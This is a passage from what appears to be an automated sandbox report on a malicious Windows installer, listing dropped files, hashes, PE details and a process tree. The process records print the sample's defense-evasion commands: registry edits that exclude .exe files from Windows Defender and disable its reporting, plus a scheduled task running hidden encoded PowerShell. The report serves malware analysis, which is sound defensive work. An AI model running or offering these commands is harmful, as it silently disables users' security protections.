                            SHA-256:5F08875E4A6BE7333B7C56A7886EB4DB4785EF8423DE97D07008D047C16B360A
                            SHA-512:9BE0F3194A02DE1BD5D375EB81663F515E409710CAEA6DE14E21ECF385477BE77FBD9DF43C0D609B24B593EC8894572F1F2044F5A74F07714A0645D7F5189616
                            Malicious:false
                            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

                            C:\Windows\System32\GroupPolicy\gpt.ini

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):268
                            Entropy (8bit):4.9507895998010145
                            Encrypted:false
                            SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                            MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                            SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                            SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                            SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                            Malicious:true
                            Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

                            C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job

                            Download File
                            Process:C:\Windows\SysWOW64\schtasks.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):532
                            Entropy (8bit):3.658255490968357
                            Encrypted:false
                            SSDEEP:12:poDBJSGQ1zKvkua3KMiTM5pgQ1zKvkuMzcFaV6:pG25vz+O15vfz8
                            MD5:994758BDDB3C8D6ADF78A680641AD848
                            SHA1:975BB5F5437BA677A27EC3A9ADA7AA03BD7DABDE
                            SHA-256:7EA9020AF7B09CED7041E5B68A80C90ABD542AAAF1ED9B845F237B1CD4E6AC19
                            SHA-512:C736FDC23FBE881D632EEDD9DC82044A181470A77107939F9D2DB8A1DB3466C202F0F85F09E9FF575DCCE84CB131B4D35CC192B221B0BA2BDAA3BA006235CF75
                            Malicious:false
                            Preview:....7+".J..D...o..-fF.......<... .....s...............................Q.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.\.p.J.K.K.X.s.E...e.x.e.....D.C. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...E.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.a.l.f.o.n.s...................0...............................................

                            C:\Windows\Temp\__PSScriptPolicyTest_axhrt4ac.t0b.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Windows\Temp\__PSScriptPolicyTest_nwf0dec5.oqg.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7104512
                            Entropy (8bit):7.680459343919421
                            Encrypted:false
                            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                            MD5:893793FBD70BA4A92919D09205D6C9C1
                            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\System32\gpupdate.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):129
                            Entropy (8bit):4.366220328806915
                            Encrypted:false
                            SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                            MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                            SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                            SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                            SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                            Malicious:false
                            Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.996908423754259
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:7604002
                            MD5:e99e15a440798e20c682eb859b3f7885
                            SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
                            SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
                            SHA512:6cbbae34ab571522545be0c27e1f13cf0d8545f8ba69c3d343b3ac1c1f113b7dbe6e3ce26a3897a1197bc0b57378165ab8145c29332b99d83e50b87c513e7d5e
                            SSDEEP:196608:91OcMHdXjgqBmVcMymSmuw3lIk3+C83fqpI/jdyNVaZ4g:3OcuF9m51T1Iku93f8wd8Rg
                            TLSH:6276333174C19CF2DE173231A28D2AE175F6EDD84D636A3717428A3A297D24AC3B1E53
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........

                            File Icon

                            Icon Hash:8484d4f2b8f47434

                            Static PE Info

                            General

                            Entrypoint:0x414b04
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:
                            Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:3786a4cf8bfee8b4821db03449141df4

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            push FFFFFFFFh
                            push 0041B9E0h
                            push 00414A2Ch
                            mov eax, dword ptr fs:[00000000h]
                            push eax
                            mov dword ptr fs:[00000000h], esp
                            sub esp, 58h
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-18h], esp
                            call dword ptr [0041B074h]
                            xor edx, edx
                            mov dl, ah
                            mov dword ptr [004233D0h], edx
                            mov ecx, eax
                            and ecx, 000000FFh
                            mov dword ptr [004233CCh], ecx
                            shl ecx, 08h
                            add ecx, edx
                            mov dword ptr [004233C8h], ecx
                            shr eax, 10h
                            mov dword ptr [004233C4h], eax
                            push 00000001h
                            call 00007FA12CD567EBh
                            pop ecx
                            test eax, eax
                            jne 00007FA12CD5595Ah
                            push 0000001Ch
                            call 00007FA12CD55A18h
                            pop ecx
                            call 00007FA12CD5629Dh
                            test eax, eax
                            jne 00007FA12CD5595Ah
                            push 00000010h
                            call 00007FA12CD55A07h
                            pop ecx
                            xor esi, esi
                            mov dword ptr [ebp-04h], esi
                            call 00007FA12CD5840Ch
                            call dword ptr [0041B078h]
                            mov dword ptr [00425A3Ch], eax
                            call 00007FA12CD582CAh
                            mov dword ptr [00423340h], eax
                            call 00007FA12CD58073h
                            call 00007FA12CD57FB5h
                            call 00007FA12CD57A10h
                            mov dword ptr [ebp-30h], esi
                            lea eax, dword ptr [ebp-5Ch]
                            push eax
                            call dword ptr [0041B07Ch]
                            call 00007FA12CD57F46h
                            mov dword ptr [ebp-64h], eax
                            test byte ptr [ebp-30h], 00000001h
                            je 00007FA12CD55958h
                            movzx eax, word ptr [ebp+00h]

                            Rich Headers

                            Programming Language:
                            • [ C ] VS98 (6.0) SP6 build 8804
                            • [C++] VS98 (6.0) SP6 build 8804
                            • [ C ] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [EXP] VC++ 6.0 SP5 build 8804

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa60.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x199ea0x19a00False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x1b0000x44940x4600False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x200000x5a480x3200False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .sxdata0x260000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x270000xa600xc00False0.3388671875data3.3019646948427273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x274a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                            RT_ICON0x277880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
                            RT_DIALOG0x278d80xb8dataEnglishUnited States
                            RT_STRING0x279900x94dataEnglishUnited States
                            RT_STRING0x27a280x34dataEnglishUnited States
                            RT_GROUP_ICON0x278b00x22dataEnglishUnited States
                            RT_VERSION0x271e00x2bcdataEnglishUnited States

                            Imports

                            DLLImport
                            OLEAUT32.dllVariantClear, SysAllocString
                            USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                            SHELL32.dllShellExecuteExA
                            KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            No network behavior found

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:1
                            Start time:19:03:57
                            Start date:24/11/2022
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x400000
                            File size:7604002 bytes
                            MD5 hash:E99E15A440798E20C682EB859B3F7885
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            General

                            Target ID:3
                            Start time:19:03:59
                            Start date:24/11/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe
                            Imagebase:0x400000
                            File size:6571809 bytes
                            MD5 hash:65D01849A2062434BCE6C580CDA92A1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            General

                            Target ID:5
                            Start time:19:04:01
                            Start date:24/11/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe /S /site_id "525403"
                            Imagebase:0x230000
                            File size:7104512 bytes
                            MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 51%, ReversingLabs
                            Reputation:low

                            General

                            Target ID:10
                            Start time:19:04:04
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0x13e0000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:11
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:12
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0x13e0000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:13
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ffff0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:14
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:15
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:16
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:17
                            Start time:19:04:06
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:18
                            Start time:19:04:06
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:19
                            Start time:19:04:06
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:20
                            Start time:19:04:09
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:21
                            Start time:19:04:09
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:22
                            Start time:19:04:09
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /run /I /tn "gAhELFxgt"
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:23
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:24
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                            Imagebase:0x7ff7fbaf0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:25
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:26
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /DELETE /F /TN "gAhELFxgt"
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:27
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
